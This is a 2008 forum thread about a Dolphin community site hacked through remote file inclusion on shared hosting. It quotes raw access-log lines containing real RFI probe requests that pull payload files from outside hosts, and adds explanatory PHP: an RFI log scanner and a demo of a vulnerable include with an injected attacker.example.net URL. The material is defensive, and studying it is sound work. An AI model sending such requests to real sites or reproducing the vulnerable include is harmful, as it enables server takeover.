Site Hacked

rednerus posted 27th of July 2008 in Community Voice. 9 comments.

To my surprise, one fine morning I saw my Dolphin site (v6.1.2, which was hosted on ixweb shared hosting) hacked. All the files in the /inc directory and all the profile images/music files/video files were removed. I had not taken a backup of my site for the past few days, so I lost a few members and the pictures/videos/music of existing members.

Did anybody experience the same?

When I looked at the analytics I observed a few visits from Nigeria/Lagos on the same day, and on virus-scanning my Dolphin site files after downloading them I saw a few files which were infected. I found them in the cache and langs folders, and the files were named:

hp.php, msconfig.php, mode.php, hp.php, botnet.pl

I had to reinstall the whole site with the latest source (v6.1.4). Unfortunately I could not find the IP addresses of the Nigerian visitors, even from Webalizer.

My question is: with the security patch that was released recently, would I be free from this type of hack?

I found a site at http://www.wizcrafts.net/nigerian-blocklist.html and altered the .htaccess file in the root to block traffic from Nigeria.

Is there anything I could do to avoid this kind of attack? Any suggestions?

Comments
sammie
Get a dedicated server, or host with someone that has a dedicated server. There are a few of us that have a dedicated server and offer hosting; as we set up our servers for our Dolphin sites, you can be assured that, unlike shared hosting, we protect our own servers from hackers as much as we can.

Shared hosts set up their servers to accommodate the masses, and leave huge security holes in them.
lrepton
Yup... this morning it is down again at ixwebhosting.com! Webserver problems!

Even though we have "dedicated" servers for our domain there, the database is on a "shared" server.

So far I have not been hacked (fingers crossed). But I added the php.ini file suggested by many to alter register_globals, which ixwebhosting has ON (it should be OFF for security).
DosDawg
As noted on the blogs from Boonex, there have been two releases that address security problems. But I take the stand sammie has: first of all, read the server requirements that Boonex recommends; when you go against what the developer says, then you have to expect unpredictable outcomes. Now beyond that, if you are on a server where register_globals is ON, then you are defying gravity itself; as stated by php.net, register_globals should be off, and developers should try to write their software so that register_globals is not required to be on.

Now when you go to a host where, by default, they have turned on register_globals, you have to see the red flags standing up in the air on that one. What happens is that it doesn't necessarily have to be the Dolphin suite that gets hacked, but the server itself; that is the vulnerability more so than the script. Once the server is compromised, the culprits will use whatever avenue they can to access sites and deface them. It's a game to them, so one jamokey buys himself a $1.99 hosting account and all his little cronies then try their attacks; once they have a script that has the RFI exploit exposed, then they start posting this information. It's not that any one individual pays the money; look at the sparse wan that was hit. Most all kids who have a website, be it PHP or Joomla or whatever, are most likely on a shared server, then they have their clan, and as soon as they find a script with a hole, it's posted on the internet that there is a hole in the script, not otherwise accessible but for the script being hosted on a shared server.

Now what happens is that they load up a remote shell script (PHP) and they all get busy looking around in the server. Why is it they don't get caught, you say? Well, granted it is a shared server account; nobody at the hosting company really cares if the data gets lost or not, just as 100 $1.99 accounts leave, 100 $1.99 accounts come in the next day. This server is not monitored, and you are just fair game when you are on a shared hosting environment.

So yes, you can apply what patches you can find, you can upload the latest release, but to me this is only running on a wing and a prayer. You need to get to a VPS at minimum, and better than that is a dedicated server. Well, I am done rambling.

later,
DosDawg
sammie
You cannot be on a dedicated server; you have your own box, and your own database is on that box,
so you must be on shared hosting if you have to use a database other than localhost.
GoDaddy have the same setup with their shared hosting: they have you use a database on another server.
sammie
This is a chat I had with your host:

I believe you are mixing up a dedicated IP with a dedicated server; they do not have any VPS or dedicated servers on offer for hosting.

Chat Information: Please wait for a site operator to respond.

Chat Information: You are now chatting with 'Alex Golovko'

Alex Golovko: Hello, my name is Alex, please let me know how can I help you today?

you: Hi, I was looking at your site and I do not see any dedicated servers or VPS

you: Do you not offer either?

you: Or are you just a shared hosting plan?

Alex Golovko: We're not providing dedicated or VPS servers, sorry, all servers are shared

you: OK, thank you ever so much for your help, have a nice day

This comment is the killer:
We offer hosting on both Linux and Windows platforms. Our servers run ANY application you like!

Hackers can run any application they like.

Love it.
gameutopia
If they have register_globals on with all their servers, that seems odd. Maybe they are using an older version of PHP, which could potentially be the cause of other vulnerabilities. But it wouldn't make sense that they wouldn't just turn it off. Or possibly it's something with their setup; in particular, the software they run is an older script that requires register_globals on. I don't know H-Sphere that well; last time I checked that's what they were running. Or maybe their billing/automation script requires this. It does seem kind of odd that a fairly large host like ixwebhosting hasn't had other problems related to register_globals being on and made some adjustments.
sammie
This comment is the killer:
We offer hosting on both Linux and Windows platforms. Our servers run ANY application you like!

Hackers can run any application they like.

Love it.

You missed that part: to run any app you need to have register_globals on.

They are telling you that anyone can run anything on their shared servers.

They do not have any other servers; all are shared, all are set up to run any app you want.

That's register_globals on, on all their servers.

They blame the hacking on the scripts, not their hosting practices.
Little you gets hacked, they tell you to patch your script, it ain't their fault.
LMFAO
rednerus
Thanks sammie, DosDawg, gameutopia for your inputs.
I would certainly go for a dedicated server once the site becomes a bit busy. I would at least go for a VPS for now, but I am still not convinced that I would be safe either. I chose IX after knowing that it was one of the best sites, and I host several of my other websites over there now. I think I will have to change the host now.
I looked at the log files and found these:
189.112.40.11 - - [24/Jul/2008:21:36:06 -0500] "GET //?sIncPath=http://h1.ripway.com/jovem1/jovemNOR.txt? HTTP/1.1" 200 98 "-" "Mozilla/3.0 (compatible; Indy Library)"
216.206.238.35 - - [24/Jul/2008:21:50:23 -0500] "GET /?sIncPath=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 200 98 "-" "libwww-perl/5.803"
148.223.69.2 - - [24/Jul/2008:21:53:28 -0500] "GET //?sIncPath=http://hibbard22.net/id.txt? HTTP/1.1" 200 98 "-" "libwww-perl/5.805"
189.112.40.11 - - [24/Jul/2008:22:12:43 -0500] "GET //?sIncPath=http://h1.ripway.com/jovem2/id.txt? HTTP/1.1" 200 98 "-" "Mozilla/3.0 (compatible; Indy Library)"
98.129.33.59 - - [24/Jul/2008:22:27:29 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://www.medmix.com/oye.txt%0D?? HTTP/1.1" 200 550 "-" "libwww-perl/5.805"
67.205.76.81 - - [24/Jul/2008:22:27:07 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://radioactivecrew.com/ec.txt??? HTTP/1.1" 200 371 "-" "libwww-perl/5.810"
67.205.76.81 - - [24/Jul/2008:22:27:01 -0500] "GET /privacy.php//plugins/safehtml/safehtml.php?dir[plugins]=http://www.medmix.com/oye.txt?? HTTP/1.1" 302 5 "-" "libwww-perl/5.810"
67.205.76.81 - - [24/Jul/2008:22:27:01 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://www.medmix.com/oye.txt?? HTTP/1.1" 200 313 "-" "libwww-perl/5.810"
67.205.76.81 - - [24/Jul/2008:22:27:01 -0500] "GET /privacy.php//plugins/safehtml/safehtml.php?dir[plugins]=http://www.medmix.com/oye.txt?? HTTP/1.1" 200 15239 "-" "libwww-perl/5.810"
67.205.76.81 - - [24/Jul/2008:22:27:01 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://www.medmix.com/oye.txt?? HTTP/1.1" 200 313 "-" "libwww-perl/5.810"
67.205.76.81 - - [24/Jul/2008:22:27:50 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://www.medmix.com/oye.txt?? HTTP/1.1" 200 313 "-" "libwww-perl/5.810"
67.205.76.81 - - [24/Jul/2008:22:27:50 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://www.medmix.com/oye.txt?? HTTP/1.1" 200 313 "-" "libwww-perl/5.810"
67.205.76.81 - - [24/Jul/2008:22:27:56 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://radioactivecrew.com/ec.txt??? HTTP/1.1" 200 371 "-" "libwww-perl/5.810"
98.129.33.59 - - [24/Jul/2008:22:28:43 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://www.medmix.com/oye.txt%0D?? HTTP/1.1" 200 550 "-" "libwww-perl/5.805"
216.246.91.250 - - [24/Jul/2008:22:28:44 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://www.medmix.com/oye.txt%0D?? HTTP/1.1" 200 550 "-" "libwww-perl/5.810"
216.246.91.250 - - [24/Jul/2008:22:28:04 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://www.medmix.com/oye.txt%0D?? HTTP/1.1" 200 550 "-" "libwww-perl/5.810"
98.129.33.59 - - [24/Jul/2008:22:30:32 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://shoptoearnopportunity.com/images/css.png?? HTTP/1.1" 200 627 "-" "libwww-perl/5.805"
98.129.33.59 - - [24/Jul/2008:22:30:32 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://shoptoearnopportunity.com/images/css.png?? HTTP/1.0" 200 601 "-" "Mozilla/5.0"
98.129.33.59 - - [24/Jul/2008:22:30:40 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://radioactivecrew.com/ec.txt?? HTTP/1.1" 200 371 "-" "libwww-perl/5.805"
98.129.33.59 - - [24/Jul/2008:22:30:41 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://shoptoearnopportunity.com/images/css.png?? HTTP/1.1" 200 627 "-" "libwww-perl/5.805"
98.129.33.59 - - [24/Jul/2008:22:30:41 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://shoptoearnopportunity.com/images/css.png?? HTTP/1.0" 200 601 "-" "Mozilla/5.0"
98.129.33.59 - - [24/Jul/2008:22:30:48 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://radioactivecrew.com/ec.txt?? HTTP/1.1" 200 371 "-" "libwww-perl/5.805"
98.129.33.59 - - [24/Jul/2008:22:40:22 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://shoptoearnopportunity.com/images/css.png?? HTTP/1.1" 200 627 "-" "libwww-perl/5.805"
98.129.33.59 - - [24/Jul/2008:22:40:22 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://shoptoearnopportunity.com/images/css.png?? HTTP/1.0" 200 601 "-" "Mozilla/5.0"
98.129.33.59 - - [24/Jul/2008:22:40:30 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://radioactivecrew.com/ec.txt?? HTTP/1.1" 200 371 "-" "libwww-perl/5.805"
82.128.9.68 - - [25/Jul/2008:04:59:49 -0500] "GET //plugins/safehtml/safehtml.php?dir%5Bplugins%5D=http%3A%2F%2F6babe.dk%2Fst%2Fc.txt%3F&act=img&img=back HTTP/1.1" 200 131 "//plugins/safehtml/safehtml.php?dir[plugins]=http://6babe.dk/st/c.txt?" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
82.128.9.68 - - [25/Jul/2008:04:59:50 -0500] "GET //plugins/safehtml/safehtml.php?dir%5Bplugins%5D=http%3A%2F%2F6babe.dk%2Fst%2Fc.txt%3F&act=img&img=home HTTP/1.1" 200 221 "//plugins/safehtml/safehtml.php?dir[plugins]=http://6babe.dk/st/c.txt?" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
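The log lines above are exactly what a site owner should be searching for: a query-string parameter (sIncPath, dir[plugins]) whose value is a URL on another host, typically ending in a stray "?" or "??". The following is an added example in PHP (the language Dolphin is written in), not code from this post or from BoonEx. It parses Apache combined-format lines, reports every such request with the client IP, the targeted script, the parameter and the remote payload, and flags the library user agents that mass RFI scanners leave behind. The sample lines inside the block are constructed for the example (RFC 5737 addresses, an example.net payload host); LOG_RE, REMOTE_RE, SCANNER_UA_RE and the function names are the example's own.

```php
<?php
// Added example, not code from this post or from BoonEx: scan Apache "combined" access-log
// lines for remote-file-inclusion (RFI) probes of the shape quoted above, i.e. a query-string
// parameter whose value is a URL on another host. The lines in $sample are constructed for
// this example (RFC 5737 addresses, an example.net payload host), not copied from any server.

// host ident user [time] "method target protocol" status bytes "referer" "user-agent"
const LOG_RE = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) \S+" (\d{3}) (\S+) "[^"]*" "([^"]*)"$/';
// A value that points off-box is the RFI signature. The trailing "?" (or "??", or an encoded
// CR) is the usual trick: whatever the script appends to the path becomes a query string.
const REMOTE_RE = '~^(?:https?|ftp)://~i';
// User agents that dominate the quoted log: library defaults of mass RFI scanners.
const SCANNER_UA_RE = '/libwww-perl|Indy Library/i';

function parse_line(string $line): ?array
{
    if (!preg_match(LOG_RE, trim($line), $m)) {
        return null;
    }
    // parse_url() misreads targets that begin with "//", so split on the first "?" by hand.
    $qpos = strpos($m[4], '?');
    return [
        'ip'     => $m[1],
        'time'   => $m[2],
        'method' => $m[3],
        'path'   => $qpos === false ? $m[4] : substr($m[4], 0, $qpos),
        'query'  => $qpos === false ? '' : substr($m[4], $qpos + 1),
        'status' => (int) $m[5],
        'bytes'  => $m[6],
        'agent'  => $m[7],
    ];
}

// Return [param => remote URL] for every query parameter whose value is a remote URL.
function rfi_params(string $query): array
{
    $hits = [];
    foreach (array_filter(explode('&', $query), 'strlen') as $pair) {
        [$k, $v] = array_pad(explode('=', $pair, 2), 2, '');
        $v = rawurldecode($v);             // dir%5Bplugins%5D=http%3A%2F%2F... arrives encoded
        if (preg_match(REMOTE_RE, $v)) {
            $hits[rawurldecode($k)] = rtrim($v, "?\r\n");
        }
    }
    return $hits;
}

function scan(array $lines): array
{
    $findings = [];
    foreach ($lines as $line) {
        $rec = parse_line($line);
        if ($rec === null) {
            continue;
        }
        foreach (rfi_params($rec['query']) as $param => $url) {
            $findings[] = [
                'ip'      => $rec['ip'],
                'time'    => $rec['time'],
                'script'  => $rec['path'],
                'param'   => $param,
                'payload' => $url,
                // 200 only means the PHP script ran, not that the include succeeded; compare
                // the byte count with a normal response to the same script to tell them apart.
                'status'  => $rec['status'],
                'bytes'   => $rec['bytes'],
                'scanner' => (bool) preg_match(SCANNER_UA_RE, $rec['agent']),
            ];
        }
    }
    return $findings;
}

// Constructed sample, modelled on the quoted lines; the last line is a normal request.
$sample = [
    '192.0.2.10 - - [24/Jul/2008:21:36:06 -0500] "GET //?sIncPath=http://payload.example.net/id.txt? HTTP/1.1" 200 98 "-" "libwww-perl/5.805"',
    '198.51.100.7 - - [24/Jul/2008:22:27:29 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://payload.example.net/oye.txt%0D?? HTTP/1.1" 200 550 "-" "libwww-perl/5.805"',
    '198.51.100.7 - - [25/Jul/2008:04:59:49 -0500] "GET //plugins/safehtml/safehtml.php?dir%5Bplugins%5D=http%3A%2F%2Fpayload.example.net%2Fc.txt%3F&act=img&img=back HTTP/1.1" 200 131 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [25/Jul/2008:05:12:01 -0500] "GET /index.php?page=profile HTTP/1.1" 200 15239 "-" "Mozilla/5.0"',
];

foreach (scan($sample) as $f) {
    printf("%-13s %s %s %s=%s [%d, %s bytes]%s\n", $f['ip'], $f['time'], $f['script'],
        $f['param'], $f['payload'], $f['status'], $f['bytes'], $f['scanner'] ? ' scanner-UA' : '');
}
```

Run it with php from the command line; to scan a real log, replace $sample with file('access_log'). The first three constructed lines are reported, the fourth is not. A 200 in the status column only says the PHP script executed, so compare the byte count against a normal response to the same script before treating a hit as a successful compromise. The same REMOTE_RE test can be applied at the web server with a mod_rewrite RewriteCond on %{QUERY_STRING} to reject such requests before PHP runs, but that is a stopgap next to turning register_globals off and fixing the include.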
AndreyP
1. If you have register_globals Off, such injections will be impossible:
xxx.php?sIncPath=unwanted_code_path

2. Since 6.1.4 we always re-set all variables before using them, so they will not pick up incoming params even then.

3. We don't use global $dir in unsafe places any more.
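To make AndreyP's points concrete, here is an added example in PHP that is not Dolphin's source: the file name header.inc.php, the constant BX_ROOT and the function names are hypothetical illustrations of the pattern. It shows the include pattern that register_globals=On turns into the xxx.php?sIncPath=... injection, simulates register_globals with extract() on a constructed request, and then the hardened form: the include base re-assigned from an application constant before it is used (point 2) and the resolved path checked to be an existing local file under that base before include() would ever see it.

```php
<?php
// Added example, not Dolphin or BoonEx code: the PHP include pattern that register_globals=On
// turns into a remote file inclusion (the "xxx.php?sIncPath=..." case AndreyP describes),
// next to the hardened form. File names, variable names and BX_ROOT are hypothetical
// illustrations of the pattern, not BoonEx's actual source.

// ---- Vulnerable pattern ---------------------------------------------------------------
// With register_globals=On, PHP creates $sIncPath from the request before any code runs.
// A file that uses the variable but never assigns it therefore includes whatever the URL said.
function vulnerable_header_path(): string
{
    global $sIncPath;                 // never initialised in this file; may come from ?sIncPath=
    return $sIncPath . 'header.inc.php';
}

// ---- Hardened pattern -----------------------------------------------------------------
// 1. The include base is (re)assigned from an application constant, never read from a global.
// 2. The final path must resolve to an existing file under that base before include() runs.
define('BX_ROOT', sys_get_temp_dir() . '/rfi_demo_' . getmypid() . '/');   // demo root (assumption)

function safe_include_path(string $relative): string
{
    $sIncPath = BX_ROOT . 'inc/';     // re-set unconditionally; a request cannot change this
    if (strpos($relative, '://') !== false || strpos($relative, "\0") !== false) {
        throw new RuntimeException("refusing URL or NUL in include name: $relative");
    }
    $base = realpath($sIncPath);
    $real = realpath($sIncPath . $relative);
    if ($base === false || $real === false
        || strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new RuntimeException("include path escapes $sIncPath: $relative");
    }
    return $real;
}

// ---- Demonstration -------------------------------------------------------------------
// Simulate register_globals with extract(): this is exactly the effect the setting has.
$_GET = ['sIncPath' => 'http://attacker.example.net/shell.txt?'];   // constructed request
extract($_GET);
echo "vulnerable: include(", vulnerable_header_path(), ")\n";
// -> include(http://attacker.example.net/shell.txt?header.inc.php). With allow_url_include
//    on, PHP fetches and executes the attacker's file; the "?" turns "header.inc.php" into
//    a harmless query string on the attacker's server.

mkdir(BX_ROOT . 'inc', 0700, true);
file_put_contents(BX_ROOT . 'inc/header.inc.php', "<?php // stand-in for a real include\n");
foreach (['header.inc.php', '../../etc/passwd', 'http://attacker.example.net/shell.txt?'] as $name) {
    try {
        echo "hardened:   include(", safe_include_path($name), ")\n";
    } catch (RuntimeException $e) {
        echo "hardened:   rejected: ", $e->getMessage(), "\n";
    }
}
unlink(BX_ROOT . 'inc/header.inc.php');
rmdir(BX_ROOT . 'inc');
rmdir(BX_ROOT);
```

Run it with php from the command line: the vulnerable function returns the attacker's URL, the hardened one accepts only header.inc.php and rejects the traversal and the URL. The hardened function holds even if register_globals were still On, because it overwrites $sIncPath before reading it. From the server side, register_globals = Off and allow_url_include = Off in php.ini (or a per-site php.ini on hosts like the one discussed) close the same hole; allow_url_include is the setting that lets include() fetch a URL at all and has defaulted to Off since PHP 5.2. The shells the thread found in cache/ and langs/ are the second stage: those directories have to be writable by the web server, so once an include has run attacker code it can write there.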